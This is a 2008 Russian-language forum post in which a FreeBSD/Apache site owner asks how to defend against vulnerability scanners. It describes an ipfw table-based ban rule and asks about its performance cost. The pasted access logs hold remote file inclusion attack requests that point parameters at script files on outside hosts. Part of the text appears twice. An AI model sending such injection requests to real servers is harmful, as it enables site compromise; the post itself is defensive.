Защита от сканеров
Добавлено: 2008-10-10 22:26:29
Есть проблема, сканят нещадно сайт вот такой гадостью
Написал небольшой скрипт, который по крону кладет в бан ip-ы сканеров.
http://www.skillz.ru/dev/freebsd/articl ... erami.html
В фаерволе правило стоит первым
deny ip from table(0) to any
Гадов за 4 дня наловилось достаточно
# ipfw -a list
15111 887563 deny ip from table(0) to any
Щас смотрю
ipfw table 0 list | wc -l
Там записей уже 4500 с копейками. Сильно ли это отражается на производительности сети?
Я так понимаю для каждого пакета нужно пробежаться по таблице и сравнить.
Подскажите как организовать более правильную защиту?
система Free5.5/apache2.2
Код: Выделить всё
...
69.73.189.182 - - [05/Oct/2008:03:31:29 +0400] "GET /page/5/errors.php?error=http://www.ezy-hosts.com//temp/errors??? HTTP/1.1" 200 626 "-" "libwww-perl/5.79"
72.249.95.130 - - [05/Oct/2008:03:32:15 +0400] "GET /galleria.html.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 200 630 "-" "libwww-perl/5.805"
62.44.82.234 - - [05/Oct/2008:03:26:25 +0400] "GET /errors.php?error=http://www.stichtingopvangratten.nl/cache/response.txt??? HTTP/1.1" 200 639 "-" "libwww-perl/5.803"
61.80.90.1 - - [05/Oct/2008:03:19:38 +0400] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 200 620 "-" "libwww-perl/5.79"
61.80.90.1 - - [05/Oct/2008:03:19:38 +0400] "GET /bans/page/6/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 200 632 "-" "libwww-perl/5.79"
...
http://www.skillz.ru/dev/freebsd/articl ... erami.html
В фаерволе правило стоит первым
deny ip from table(0) to any
Гадов за 4 дня наловилось достаточно
# ipfw -a list
15111 887563 deny ip from table(0) to any
Щас смотрю
ipfw table 0 list | wc -l
Там записей уже 4500 с копейками. Сильно ли это отражается на производительности сети?
Я так понимаю для каждого пакета нужно пробежаться по таблице и сравнить.
Подскажите как организовать более правильную защиту?
система Free5.5/apache2.2